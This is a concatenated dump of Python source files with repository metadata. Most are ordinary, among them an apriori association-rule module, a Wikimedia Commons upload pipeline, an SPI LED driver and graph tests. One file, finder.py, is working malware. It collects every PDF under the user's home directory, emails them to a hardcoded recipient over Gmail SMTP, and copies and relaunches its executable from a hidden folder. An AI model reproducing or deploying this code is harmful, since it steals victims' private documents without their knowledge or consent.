] | 5 | 2018-07-16T16:23:21.000Z | 2021-08-20T15:43:23.000Z | neuroscout/resources/dataset.py | jdkent/neuroscout | 67aaafdf883988e2048197dc9ce4559a28e3b7b6 | [
"BSD-3-Clause"
] | 719 | 2018-07-09T17:19:57.000Z | 2022-03-30T15:30:59.000Z | neuroscout/resources/dataset.py | jdkent/neuroscout | 67aaafdf883988e2048197dc9ce4559a28e3b7b6 | [
"BSD-3-Clause"
] | 9 | 2019-07-10T17:45:31.000Z | 2021-08-30T21:51:21.000Z | from flask_apispec import MethodResource, marshal_with, doc, use_kwargs
from webargs import fields
from ..models import Dataset
from ..core import cache
from .utils import first_or_404
from ..schemas.dataset import DatasetSchema
| 35.28125 | 75 | 0.680248 |
0b2a468542d7634a98be235c3eb2a43a90a6aa6a | 2,194 | py | Python | tests/test_measures.py | lanxuedang/TIGER | a134b49f9c64321cb521a25953f9771ced9b597e | [
"MIT"
] | 88 | 2020-06-11T03:14:30.000Z | 2022-03-21T07:36:36.000Z | tests/test_measures.py | lanxuedang/TIGER | a134b49f9c64321cb521a25953f9771ced9b597e | [
"MIT"
] | 4 | 2021-04-29T19:22:08.000Z | 2021-09-22T19:22:48.000Z | tests/test_measures.py | lanxuedang/TIGER | a134b49f9c64321cb521a25953f9771ced9b597e | [
"MIT"
] | 13 | 2020-06-14T14:19:01.000Z | 2022-02-17T22:50:41.000Z | import numpy as np
from graph_tiger.graphs import o4_graph, p4_graph, c4_graph, k4_1_graph, k4_2_graph
from graph_tiger.graphs import two_c4_0_bridge, two_c4_1_bridge, two_c4_2_bridge, two_c4_3_bridge
from graph_tiger.measures import run_measure
if __name__ == '__main__':
main()
| 42.192308 | 97 | 0.591613 |
0b303fe60108c7d81edf13f0852f1b122917c330 | 13,679 | py | Python | AuroraAppCode/login.py | zahraahhajhsn/automatic-student-counter | 9b3e38f41aba3fbc59e1ccdaeae9ba229415f977 | [
"Apache-2.0"
] | null | null | null | AuroraAppCode/login.py | zahraahhajhsn/automatic-student-counter | 9b3e38f41aba3fbc59e1ccdaeae9ba229415f977 | [
"Apache-2.0"
] | null | null | null | AuroraAppCode/login.py | zahraahhajhsn/automatic-student-counter | 9b3e38f41aba3fbc59e1ccdaeae9ba229415f977 | [
"Apache-2.0"
] | null | null | null |
import verifyController
import pyodbc
from PyQt5.QtWidgets import QMessageBox
from PyQt5 import QtCore, QtGui, QtWidgets
from PySide2.QtCore import (QCoreApplication, QMetaObject,QSize,Qt)
from PySide2.QtGui import (QCursor, QFont,QIcon)
from PySide2.QtWidgets import *
from PySide2 import QtCore, QtGui, QtWidgets
import cameras
import pickle
import smtplib
from random import randint
import PyQt5
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
LoginWindow = QtWidgets.QMainWindow()
ui = Ui_LoginWindow()
ui.setupUi(LoginWindow)
LoginWindow.show()
sys.exit(app.exec_())
| 52.209924 | 238 | 0.59288 |
0b306e809cb7c5ad319eabca404494268373c70e | 13,195 | py | Python | ml/association/apriori.py | thorwhalen/ut | 353a4629c35a2cca76ef91a4d5209afe766433b4 | [
"MIT"
] | 4 | 2016-12-17T20:06:10.000Z | 2021-11-19T04:45:29.000Z | ml/association/apriori.py | thorwhalen/ut | 353a4629c35a2cca76ef91a4d5209afe766433b4 | [
"MIT"
] | 11 | 2021-01-06T05:35:11.000Z | 2022-03-11T23:28:31.000Z | ml/association/apriori.py | thorwhalen/ut | 353a4629c35a2cca76ef91a4d5209afe766433b4 | [
"MIT"
] | 3 | 2015-06-12T10:44:16.000Z | 2021-07-26T18:39:47.000Z | """Association mining -- apriori algo"""
__author__ = 'thor'
from numpy import *
# Modified from:
# Everaldo Aguiar & Reid Johnson (https://github.com/cse40647/cse40647/blob/sp.14/10%20-%20Apriori.ipynb)
#
# Itself Modified from:
# Marcel Caraciolo (https://gist.github.com/marcelcaraciolo/1423287)
#
# Functions to compute and extract association rules from a given frequent
# itemset generated by the Apriori algorithm.
import pandas as pd
from statsmodels.stats.proportion import samplesize_confint_proportion
def apriori(dataset, min_support=0.5, verbose=False):
"""Implements the Apriori algorithm.
The Apriori algorithm will iteratively generate new candidate
k-itemsets using the frequent (k-1)-itemsets found in the previous
iteration.
Parameters
----------
dataset : list
The dataset (a list of transactions) from which to generate
candidate itemsets.
min_support : float
The minimum support threshold. Defaults to 0.5.
Returns
-------
F : list
The list of frequent itemsets.
support_data : dict
The support data for all candidate itemsets.
References
----------
.. [1] R. Agrawal, R. Srikant, "Fast Algorithms for Mining Association
Rules", 1994.
"""
C1 = create_candidates(dataset)
D = list(map(set, dataset))
F1, support_data = support_prune(D, C1, min_support, verbose=False) # prune candidate 1-itemsets
F = [F1] # list of frequent itemsets; initialized to frequent 1-itemsets
k = 2 # the itemset cardinality
while (len(F[k - 2]) > 0):
Ck = apriori_gen(F[k-2], k) # generate candidate itemsets
Fk, supK = support_prune(D, Ck, min_support) # prune candidate itemsets
support_data.update(supK) # update the support counts to reflect pruning
F.append(Fk) # add the pruned candidate itemsets to the list of frequent itemsets
k += 1
if verbose:
# Print a list of all the frequent itemsets.
for kset in F:
for item in kset:
print(("" \
+ "{" \
+ "".join(str(i) + ", " for i in iter(item)).rstrip(', ') \
+ "}" \
+ ": sup = " + str(round(support_data[item], 3))))
return F, support_data
def create_candidates(dataset, verbose=False):
"""Creates a list of candidate 1-itemsets from a list of transactions.
Parameters
----------
dataset : list
The dataset (a list of transactions) from which to generate candidate
itemsets.
Returns
-------
The list of candidate itemsets (c1) passed as a frozenset (a set that is
immutable and hashable).
"""
c1 = [] # list of all items in the database of transactions
for transaction in dataset:
for item in transaction:
if not [item] in c1:
c1.append([item])
c1.sort()
if verbose:
# Print a list of all the candidate items.
print(("" \
+ "{" \
+ "".join(str(i[0]) + ", " for i in iter(c1)).rstrip(', ') \
+ "}"))
# Map c1 to a frozenset because it will be the key of a dictionary.
return list(map(frozenset, c1))
def support_prune(dataset, candidates, min_support, verbose=False):
"""Returns all candidate itemsets that meet a minimum support threshold.
By the apriori principle, if an itemset is frequent, then all of its
subsets must also be frequent. As a result, we can perform support-based
pruning to systematically control the exponential growth of candidate
itemsets. Thus, itemsets that do not meet the minimum support level are
pruned from the input list of itemsets (dataset).
Parameters
----------
dataset : list
The dataset (a list of transactions) from which to generate candidate
itemsets.
candidates : frozenset
The list of candidate itemsets.
min_support : float
The minimum support threshold.
Returns
-------
retlist : list
The list of frequent itemsets.
support_data : dict
The support data for all candidate itemsets.
"""
sscnt = {} # set for support counts
for tid in dataset:
for can in candidates:
if can.issubset(tid):
sscnt.setdefault(can, 0)
sscnt[can] += 1
num_items = float(len(dataset)) # total number of transactions in the dataset
retlist = [] # array for unpruned itemsets
support_data = {} # set for support data for corresponding itemsets
for key in sscnt:
# Calculate the support of itemset key.
support = sscnt[key] / num_items
if support >= min_support:
retlist.insert(0, key)
support_data[key] = support
# Print a list of the pruned itemsets.
if verbose:
for kset in retlist:
for item in kset:
print(("{" + str(item) + "}"))
print("")
for key in sscnt:
print(("" \
+ "{" \
+ "".join([str(i) + ", " for i in iter(key)]).rstrip(', ') \
+ "}" \
+ ": sup = " + str(support_data[key])))
return retlist, support_data
def apriori_gen(freq_sets, k):
"""Generates candidate itemsets (via the F_k-1 x F_k-1 method).
This operation generates new candidate k-itemsets based on the frequent
(k-1)-itemsets found in the previous iteration. The candidate generation
procedure merges a pair of frequent (k-1)-itemsets only if their first k-2
items are identical.
Parameters
----------
freq_sets : list
The list of frequent (k-1)-itemsets.
k : integer
The cardinality of the current itemsets being evaluated.
Returns
-------
retlist : list
The list of merged frequent itemsets.
"""
retList = [] # list of merged frequent itemsets
lenLk = len(freq_sets) # number of frequent itemsets
for i in range(lenLk):
for j in range(i+1, lenLk):
a=list(freq_sets[i])
b=list(freq_sets[j])
a.sort()
b.sort()
F1 = a[:k-2] # first k-2 items of freq_sets[i]
F2 = b[:k-2] # first k-2 items of freq_sets[j]
if F1 == F2: # if the first k-2 items are identical
# Merge the frequent itemsets.
retList.append(freq_sets[i] | freq_sets[j])
return retList
def rules_from_conseq(freq_set, H, support_data, rules, min_confidence=0.5, verbose=False):
"""Generates a set of candidate rules.
Parameters
----------
freq_set : frozenset
The complete list of frequent itemsets.
H : list
A list of frequent itemsets (of a particular length).
support_data : dict
The support data for all candidate itemsets.
rules : list
A potentially incomplete set of candidate rules above the minimum
confidence threshold.
min_confidence : float
The minimum confidence threshold. Defaults to 0.5.
"""
m = len(H[0])
if m == 1:
Hmp1 = calc_confidence(freq_set, H, support_data, rules, min_confidence, verbose)
if (len(freq_set) > (m+1)):
Hmp1 = apriori_gen(H, m+1) # generate candidate itemsets
Hmp1 = calc_confidence(freq_set, Hmp1, support_data, rules, min_confidence, verbose)
if len(Hmp1) > 1:
# If there are candidate rules above the minimum confidence
# threshold, recurse on the list of these candidate rules.
rules_from_conseq(freq_set, Hmp1, support_data, rules, min_confidence, verbose)
def calc_confidence(freq_set, H, support_data, rules, min_confidence=0.5, verbose=False):
"""Evaluates the generated rules.
One measurement for quantifying the goodness of association rules is
confidence. The confidence for a rule 'P implies H' (P -> H) is defined as
the support for P and H divided by the support for P
(support (P|H) / support(P)), where the | symbol denotes the set union
(thus P|H means all the items in set P or in set H).
To calculate the confidence, we iterate through the frequent itemsets and
associated support data. For each frequent itemset, we divide the support
of the itemset by the support of the antecedent (left-hand-side of the
rule).
Parameters
----------
freq_set : frozenset
The complete list of frequent itemsets.
H : list
A list of frequent itemsets (of a particular length).
min_support : float
The minimum support threshold.
rules : list
A potentially incomplete set of candidate rules above the minimum
confidence threshold.
min_confidence : float
The minimum confidence threshold. Defaults to 0.5.
Returns
-------
pruned_H : list
The list of candidate rules above the minimum confidence threshold.
"""
pruned_H = [] # list of candidate rules above the minimum confidence threshold
for conseq in H: # iterate over the frequent itemsets
conf = support_data[freq_set] / support_data[freq_set - conseq]
if conf >= min_confidence:
rules.append((freq_set - conseq, conseq, conf))
pruned_H.append(conseq)
if verbose:
print(("" \
+ "{" \
+ "".join([str(i) + ", " for i in iter(freq_set-conseq)]).rstrip(', ') \
+ "}" \
+ " ---> " \
+ "{" \
+ "".join([str(i) + ", " for i in iter(conseq)]).rstrip(', ') \
+ "}" \
+ ": conf = " + str(round(conf, 3)) \
+ ", sup = " + str(round(support_data[freq_set], 3))))
return pruned_H
def generate_rules(F, support_data, min_confidence=0.5, verbose=True):
"""Generates a set of candidate rules from a list of frequent itemsets.
For each frequent itemset, we calculate the confidence of using a
particular item as the rule consequent (right-hand-side of the rule). By
testing and merging the remaining rules, we recursively create a list of
pruned rules.
Parameters
----------
F : list
A list of frequent itemsets.
support_data : dict
The corresponding support data for the frequent itemsets (L).
min_confidence : float
The minimum confidence threshold. Defaults to 0.5.
Returns
-------
rules : list
The list of candidate rules above the minimum confidence threshold.
"""
rules = []
for i in range(1, len(F)):
for freq_set in F[i]:
H1 = [frozenset([itemset]) for itemset in freq_set]
if (i > 1):
rules_from_conseq(freq_set, H1, support_data, rules, min_confidence, verbose)
else:
calc_confidence(freq_set, H1, support_data, rules, min_confidence, verbose)
return rules
| 35.093085 | 117 | 0.617582 |
0b3087eb0d5de6a063260501def92d99d71d6436 | 397 | py | Python | setup.py | TechAtNYU/api-python | 26cfa78208f30c41095484422cd1232aeddbfcb2 | [
"MIT"
] | null | null | null | setup.py | TechAtNYU/api-python | 26cfa78208f30c41095484422cd1232aeddbfcb2 | [
"MIT"
] | null | null | null | setup.py | TechAtNYU/api-python | 26cfa78208f30c41095484422cd1232aeddbfcb2 | [
"MIT"
] | null | null | null | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
description='Tech@NYU API Python Client',
author='TechatNYU',
url='https://github.com/TechAtNYU/pytnyu',
author_email='hello@techatnyu.org',
version='0.0.4',
install_requires=['requests'],
namespace_packages=['pytnyu'],
packages=['pytnyu'],
name='pytnyu',
)
| 23.352941 | 46 | 0.677582 |
0b36a23da3938dd6a58c332d22bc21433cd520a7 | 2,949 | py | Python | hardware/max7219.py | gcurtis79/letsrobot | 0cb5fae07392ee3661036d138d8986c9705bcf0c | [
"Apache-2.0"
] | 26 | 2018-09-27T17:27:30.000Z | 2022-03-04T20:37:18.000Z | hardware/max7219.py | gcurtis79/letsrobot | 0cb5fae07392ee3661036d138d8986c9705bcf0c | [
"Apache-2.0"
] | 30 | 2018-10-15T03:54:58.000Z | 2020-05-28T06:57:08.000Z | hardware/max7219.py | gcurtis79/letsrobot | 0cb5fae07392ee3661036d138d8986c9705bcf0c | [
"Apache-2.0"
] | 16 | 2018-10-04T03:16:43.000Z | 2021-04-25T06:59:49.000Z | import spidev
columns = [0x1,0x2,0x3,0x4,0x5,0x6,0x7,0x8]
LEDOn = [0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF]
LEDOff = [0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0]
LEDEmoteSmile = [0x0,0x0,0x24,0x0,0x42,0x3C,0x0,0x0]
LEDEmoteSad = [0x0,0x0,0x24,0x0,0x0,0x3C,0x42,0x0]
LEDEmoteTongue = [0x0,0x0,0x24,0x0,0x42,0x3C,0xC,0x0]
LEDEmoteSurprise = [0x0,0x0,0x24,0x0,0x18,0x24,0x24,0x18]
spi = None
| 25.205128 | 57 | 0.617158 |
0b36b0a444f2d74d0736b72d8524d171de6f01c9 | 9,236 | py | Python | kkl_wikicommons_upload.py | wmilbot/wikiscraper | c0e8c2ac45bcb275584fa6606c604ee7c9c9cea7 | [
"MIT"
] | 3 | 2018-11-14T14:06:09.000Z | 2018-11-14T18:23:16.000Z | kkl_wikicommons_upload.py | wmilbot/wikiscraper | c0e8c2ac45bcb275584fa6606c604ee7c9c9cea7 | [
"MIT"
] | null | null | null | kkl_wikicommons_upload.py | wmilbot/wikiscraper | c0e8c2ac45bcb275584fa6606c604ee7c9c9cea7 | [
"MIT"
] | 2 | 2018-11-14T14:06:23.000Z | 2019-09-22T08:25:55.000Z | #!/usr/bin/env python
from datapackage_pipelines.wrapper import ingest, spew
import logging, collections
from pipeline_params import get_pipeline_param_rows
from google.cloud import storage
from contextlib import contextmanager
from tempfile import mkdtemp
import os
import pywikibot
import time
from pywikibot.pagegenerators import GeneratorFactory
import datetime
from pywikibot.specialbots import UploadRobot
from pywikibot.data.api import APIError
import sys
from datapackage import Package
LICENSE_TEMPLATE = "PD-Israel"
SUPPORTED_TEMPLATE = "Supported by Wikimedia Israel|year=2018"
FILES_CATEGORY = "Files from JNF uploaded by Wikimedia Israel"
FILES_CATEGORY_ID = "Files_from_JNF_uploaded_by_Wikimedia_Israel"
DESCRIPTION_TEMPLATE=lambda description, datestring, source, author, jnfnum: """=={{int:filedesc}}==
{{Information
|description={{he|1=__DESCRIPTION__}}
|date=__DATESTRING__
|source={{he|1=__SOURCE__}}
|author={{he|1=__AUTHOR__}}
|permission=
|other versions=
|other fields={{Information field|Name=JNF Number|Value=__JNFNUM__}}
}}
=={{int:license-header}}==
{{__LICENSE__}}
{{__SUPPORTED__}}
[[Category:__FILESCAT__]]""".replace("__DATESTRING__", datestring) \
.replace("__SOURCE__", source) \
.replace("__AUTHOR__", author) \
.replace("__JNFNUM__", jnfnum) \
.replace("__DESCRIPTION__", description) \
.replace("__LICENSE__", LICENSE_TEMPLATE) \
.replace("__SUPPORTED__", SUPPORTED_TEMPLATE) \
.replace("__FILESCAT__", FILES_CATEGORY) \
def delete_page(page):
with throttle():
page.delete(reason="Deleting duplicated images created by bot", prompt=True, mark=True)
def get_gcs_bucket(consts):
logging.info("uploading from google storage bucket {}".format(consts["gcs_bucket"]))
gcs = storage.Client.from_service_account_json(consts["gcs_secret_file"])
return gcs.get_bucket(consts["gcs_bucket"])
def init_stats():
stats = {}
stats["num eligible for download"] = 0
stats["invalid resolution"] = 0
stats["invalid description"] = 0
stats["invalid source"] = 0
stats["invalid year"] = 0
stats["in skip list"] = 0
stats["skipped start at"] = 0
stats['invalid image_path'] = 0
return stats
def get_donum_from_row(row):
return row["image_path"].replace("/ArchiveTazlumim/TopSmlPathArc/Do", "").replace(".jpeg", "")
def is_valid_row(row, stats):
if row["width_px"] * row["height_px"] < 200 * 200:
stats["invalid resolution"] += 1
logging.info('invalid resolution: {} X {}'.format(row["width_px"], row["height_px"]))
return False
elif len(row["description"]) < 3:
stats["invalid description"] += 1
logging.info('invalid description: {}'.format(row["description"]))
return False
elif len(row["source"]) < 2:
stats["invalid source"] += 1
logging.info('invalid source: {}'.format(row["source"]))
return False
elif row["date"].year > 1947:
stats["invalid year"] += 1
logging.info('invalid year: {}'.format(row["date"]))
return False
elif 'mi:' in row['image_path']:
stats['invalid image_path'] += 1
logging.info('invalid image path: {}'.format(row['image_path']))
return False
else:
stats["num eligible for download"] += 1
return True
# def load_datapackage_resources(resources, stats):
# logging.info("Loading datapackage resources...")
# donums = {}
# start_at_donum = False
# reached_start_at = False
# for resource in resources:
# for row_num, row in enumerate(resource, start=1):
# donum = get_donum_from_row(row)
# if start_at_donum and not reached_start_at and donum != start_at_donum:
# stats["skipped start at"] += 1
# elif is_valid_row(row, stats):
# if start_at_donum and donum == start_at_donum:
# reached_start_at = True
# donums[donum] = row
# stats["num eligible for download"] += 1
# return donums
if len(sys.argv) > 1 and sys.argv[1] == '--cli':
cli()
else:
ingest_spew()
| 37.092369 | 110 | 0.612711 |
0b373158f05135f2dafba65a6ba39cdf0ba87c6d | 1,348 | py | Python | Badger/scripts/besdirac-wms-decaycard-get.py | zhangxt-ihep/IHEPDIRAC | fb53500a998adc43ff0c65c02caf492da2965de5 | [
"MIT"
] | null | null | null | Badger/scripts/besdirac-wms-decaycard-get.py | zhangxt-ihep/IHEPDIRAC | fb53500a998adc43ff0c65c02caf492da2965de5 | [
"MIT"
] | 1 | 2021-03-04T08:48:38.000Z | 2021-03-04T08:48:38.000Z | Badger/scripts/besdirac-wms-decaycard-get.py | zhangxt-ihep/IHEPDIRAC | fb53500a998adc43ff0c65c02caf492da2965de5 | [
"MIT"
] | 2 | 2020-08-26T06:36:51.000Z | 2021-03-04T08:08:34.000Z | #!/usr/bin/env python
import DIRAC
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.Base import Script
Script.setUsageMessage( """
Insert random trigger file into the File Catalog
Usage:
%s [option] lfn
""" % Script.scriptName )
fcType = 'FileCatalog'
Script.parseCommandLine( ignoreErrors = False )
options = Script.getUnprocessedSwitches()
args = Script.getPositionalArgs()
from DIRAC.Interfaces.API.Dirac import Dirac
dirac = Dirac()
from DIRAC.Resources.Catalog.FileCatalogClient import FileCatalogClient
fccType = 'DataManagement/FileCatalog'
fcc = FileCatalogClient(fccType)
def getMeta(lfn, metaname):
'''Get metadata'''
result = fcc.getDirectoryMetadata(lfn)
if not result['OK']:
print result['Message']
return
if result['Value'].has_key(metaname):
return result['Value'][metaname]
if __name__ == '__main__':
main()
| 25.923077 | 96 | 0.557864 |
0b39211e58c62524837539f8c02eb738f733141e | 1,037 | py | Python | GraphSAGE/fix.py | attre2vec/attre2vec | f36a2581f3d17887d6201a76624d4ced93d6503f | [
"MIT"
] | null | null | null | GraphSAGE/fix.py | attre2vec/attre2vec | f36a2581f3d17887d6201a76624d4ced93d6503f | [
"MIT"
] | null | null | null | GraphSAGE/fix.py | attre2vec/attre2vec | f36a2581f3d17887d6201a76624d4ced93d6503f | [
"MIT"
] | null | null | null | import pickle
import networkx as nx
import numpy as np
import torch
for name in ('cora', 'citeseer', 'pubmed'):
with open(f'data/datasets/{name}.pkl', 'rb') as fin:
dataset = pickle.load(fin)
test_graph = dataset['original_graph']
e2i = dataset['edge2idx']
H = dataset['H']
node_fts = torch.zeros((test_graph.number_of_nodes(), 128))
for u, v in test_graph.edges():
ef = H[e2i[(u, v)]][3:-1]
node_fts[u] = ef[:128]
node_fts[v] = ef[128:]
train_nodes = []
for idx in range(dataset['num_datasets']):
tn = []
for u, v in dataset['Xy'][idx]['train']['X']:
if u not in tn:
tn.append(u)
if v not in tn:
tn.append(v)
train_nodes.append(tn)
nx.write_edgelist(test_graph, f'GraphSAGE/data/{name}.edgelist')
np.save(f'GraphSAGE/data/{name}-node-features', node_fts.numpy())
with open(f'GraphSAGE/data/{name}-train-nodes.pkl', 'wb') as fout:
pickle.dump(train_nodes, fout)
| 25.925 | 70 | 0.580521 |
0b3963c63ed1877c12683ef9458a7f962df91e0e | 3,243 | py | Python | finder.py | giuseppebrb/Pynder | a47defc08ff497096a1fe507ab5d7b01997b69ef | [
"MIT"
] | 3 | 2017-11-11T01:19:57.000Z | 2021-07-07T15:44:32.000Z | finder.py | giuseppebrb/Pynder | a47defc08ff497096a1fe507ab5d7b01997b69ef | [
"MIT"
] | null | null | null | finder.py | giuseppebrb/Pynder | a47defc08ff497096a1fe507ab5d7b01997b69ef | [
"MIT"
] | null | null | null | import os
import fnmatch
import smtplib
import email.mime.application
import sys
import subprocess
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from pathlib import Path
home = str(Path.home()) # Return a string representing the users home directory
fileFound = 0 # Number of files found while discovering
fileScanned = 0 # Number of the already processed files
maxSize = 23068672 # Attachments bytes limit for the mail host (22MB in byte, but it can be changed)
actualSizeCounter = 0 # Bytes count for files already attached to the email
paths = [] # List of files directories, matching the pattern, that will be print into the email body
# Following values need to be changed
email_user = "SENDER-ADDRESS-HERE"
email_pwd = "SENDER-PASSWORD-HERE"
recipient = "RECIPIENT-ADDRESS-HERE"
"""
This function will return a list of strings which represents the files path with the specified extension inside the
specified path
"""
"""
__________ START - It may NOT work on MacOS __________
| |
"""
injecting_folder = home+'\\script' # 'Injecting' folder
if not os.path.exists(injecting_folder):
os.system("mkdir %s" % injecting_folder)
executableLocation = find('EXECUTABLE-NAME-HERE.exe', os.path.dirname(os.path.abspath(__file__)))
# Create a new 'injecting' folder where software will copy itself
if not os.path.isfile(injecting_folder + "\\EXECUTABLE-NAME-HERE.exe"):
os.system("xcopy {!s} {!s} /R".format(executableLocation[0], injecting_folder))
# If current working directory is not the 'injecting' folder opens a new instance from there and close this one.
if os.getcwd() != injecting_folder:
os.chdir(injecting_folder)
subprocess.Popen([injecting_folder+'\\EXECUTABLE-NAME-HERE.exe'], stdin=None, stdout=None, stderr=None)
sys.exit()
"""
|__________ END - It may NOT work on MacOS __________|
"""
filesFound = find("*.pdf", home) # List of every pdf file found in every folder starting from the user's home directory
# Building the email structure
msg = MIMEMultipart()
msg['From'] = email_user
msg['To'] = recipient
msg['Subject'] = "Files Found"
for f in filesFound:
fp = open(r'%s' % f, 'rb')
att = email.mime.application.MIMEApplication(fp.read())
fp.close()
paths.append("Directory: " + f)
att.add_header('Content-Disposition', 'attachment; filename="%s"' % f)
msg.attach(att)
for p in paths:
msg.attach(MIMEText(p, 'plain'))
# Open the connection with mail host with specified credentials
server = smtplib.SMTP('smtp.gmail.com', 587) # These values are just an example working with Gmail, you need to change
# them with your own host's SMTP address and port
server.ehlo()
server.starttls() # Starts a secure tls connection
server.login(email_user, email_pwd)
email_body = msg.as_string()
server.sendmail(email_user, recipient, email_body) # Send the email
server.quit() # Close the connection with host
sys.exit() # Quit program
| 35.25 | 120 | 0.716929 |
0b3b1b7fa53f607bfa6820806f9bdec88c43a29d | 2,092 | py | Python | sushy/tests/unit/resources/fabric/test_endpoint.py | sapcc/sushy | 7016cc0f31050ab656e1e26c80bd44ce3e9fd57a | [
"Apache-2.0"
] | 37 | 2017-03-24T10:17:37.000Z | 2022-02-10T19:42:26.000Z | sushy/tests/unit/resources/fabric/test_endpoint.py | sapcc/sushy | 7016cc0f31050ab656e1e26c80bd44ce3e9fd57a | [
"Apache-2.0"
] | 4 | 2020-07-08T10:53:30.000Z | 2020-07-30T11:56:20.000Z | sushy/tests/unit/resources/fabric/test_endpoint.py | sapcc/sushy | 7016cc0f31050ab656e1e26c80bd44ce3e9fd57a | [
"Apache-2.0"
] | 29 | 2017-07-19T21:28:06.000Z | 2021-06-09T05:20:32.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from unittest import mock
import sushy
from sushy.resources.fabric import endpoint
from sushy.tests.unit import base
| 40.230769 | 78 | 0.68021 |
0b3d35d3fa9e0c6688b8c47ccf07458bfaa3bde8 | 231 | py | Python | engine/core/it_singleton.py | torrotitans/torro_community | a3f153e69a860f0d6c831145f529d9e92193a0ae | [
"MIT"
] | 1 | 2022-01-12T08:31:59.000Z | 2022-01-12T08:31:59.000Z | engine/core/it_singleton.py | torrotitans/torro_community | a3f153e69a860f0d6c831145f529d9e92193a0ae | [
"MIT"
] | null | null | null | engine/core/it_singleton.py | torrotitans/torro_community | a3f153e69a860f0d6c831145f529d9e92193a0ae | [
"MIT"
] | 2 | 2022-01-19T06:26:32.000Z | 2022-01-26T15:25:15.000Z | #!/usr/bin/python
# -*- coding: UTF-8 -*
from db.it.db_it_mgr import it_mgr
__all__ = {"itSingleton"}
it_singleton = itSingleton()
| 13.588235 | 38 | 0.670996 |
0b3f444aab07f3ace7008a9a2f44f279835a4a8e | 25,437 | py | Python | analyses/seasonality_paper_st/lai_only/shap_interaction/model_analysis_shap_interaction_1.py | akuhnregnier/wildfire-analysis | a04deada145cec864051d2fb15aec1a53a0246b9 | [
"MIT"
] | null | null | null | analyses/seasonality_paper_st/lai_only/shap_interaction/model_analysis_shap_interaction_1.py | akuhnregnier/wildfire-analysis | a04deada145cec864051d2fb15aec1a53a0246b9 | [
"MIT"
] | null | null | null | analyses/seasonality_paper_st/lai_only/shap_interaction/model_analysis_shap_interaction_1.py | akuhnregnier/wildfire-analysis | a04deada145cec864051d2fb15aec1a53a0246b9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from pathlib import Path
from wildfires.utils import handle_array_job_args
try:
# This will only work after the path modification carried out in the job script.
from specific import (
CACHE_DIR,
SimpleCache,
get_model,
data_split_cache,
get_shap_values,
)
except ImportError:
"""Not running as an HPC job yet."""
if __name__ == "__main__":
handle_array_job_args(
Path(__file__).resolve(),
func,
ncpus=1,
mem="7gb",
walltime="11:00:00",
max_index=1734,
)
| 14.16314 | 84 | 0.298306 |
0b3f95c97639b3abd555db4e30fef992d56dda30 | 1,954 | py | Python | tests/test_res_grp_config.py | danos/vplane-config-npf | 2103ac7e19ee77eacff30a3d11cf487dfbefee26 | [
"BSD-3-Clause"
] | null | null | null | tests/test_res_grp_config.py | danos/vplane-config-npf | 2103ac7e19ee77eacff30a3d11cf487dfbefee26 | [
"BSD-3-Clause"
] | null | null | null | tests/test_res_grp_config.py | danos/vplane-config-npf | 2103ac7e19ee77eacff30a3d11cf487dfbefee26 | [
"BSD-3-Clause"
] | 2 | 2020-05-27T10:34:20.000Z | 2021-01-20T05:40:32.000Z | #!/usr/bin/env python3
# Copyright (c) 2019, AT&T Intellectual Property.
# All rights reserved.
#
# SPDX-License-Identifier: LGPL-2.1-only
#
"""
Unit-tests for the qos_config.py module.
"""
from vyatta.res_grp.res_grp_config import ResGrpConfig
TEST_DATA = {
'vyatta-resources-v1:resources': {
'vyatta-resources-group-misc-v1:group': {
'vyatta-resources-dscp-group-v1:dscp-group': [
{
'group-name': 'group-a',
'dscp': [
'0', '1', '2', '3', '4', '5', '6', '7', '8',
'9', '10', '11', '12', '13', '14', '15'
]
}, {
'group-name': 'group-b',
'dscp': [
'16', '17', '18', '19', '20', '21', '22', '23',
'24', '25', '26', '27', '28', '29', '30', '31'
]
}, {
'group-name': 'group-c',
'dscp': [
'32', '33', '34', '35', '36', '37', '38', '39',
'40', '41', '42', '43', '44', '45', '46', '47'
]
}, {
'group-name': 'group-d',
'dscp': [
'48', '49', '50', '51', '52', '53', '54', '55',
'56', '57', '58', '59', '60', '61', '62', '63'
]
}
]
}
}
}
def test_rgconfig():
""" Simple unit-test for the ResGrpConfig class """
config = ResGrpConfig(TEST_DATA)
assert config is not None
assert len(config.dscp_groups) == 4
assert config.get_dscp_group("group-a") is not None
assert config.get_dscp_group("group-b") is not None
assert config.get_dscp_group("group-c") is not None
assert config.get_dscp_group("group-d") is not None
assert config.get_dscp_group("group-e") is None
| 32.566667 | 71 | 0.413511 |
0b4263d7f857ffd13d9244963a213a2d55a3ea6f | 36,145 | py | Python | fandango/objects.py | rhomspuron/fandango | 51cc7659dfa7ea8c5890a993bbcc4c2049e45136 | [
"CC-BY-3.0"
] | null | null | null | fandango/objects.py | rhomspuron/fandango | 51cc7659dfa7ea8c5890a993bbcc4c2049e45136 | [
"CC-BY-3.0"
] | null | null | null | fandango/objects.py | rhomspuron/fandango | 51cc7659dfa7ea8c5890a993bbcc4c2049e45136 | [
"CC-BY-3.0"
] | null | null | null | #!/usr/bin/env python2.5
#############################################################################
##
## file : objects.py
##
## description : see below
##
## project : Tango Control System
##
## $Author: srubio@cells.es, tcoutinho@cells.es, homs@esrf.fr $
##
##
## $Revision: 2008 $
##
## copyleft : ALBA Synchrotron Controls Section, CELLS
## Bellaterra
## Spain
##
#############################################################################
##
## This file is part of Tango Control System
##
## Tango Control System is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as published
## by the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
##
## Tango Control System is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, see <http://www.gnu.org/licenses/>.
###########################################################################
"""
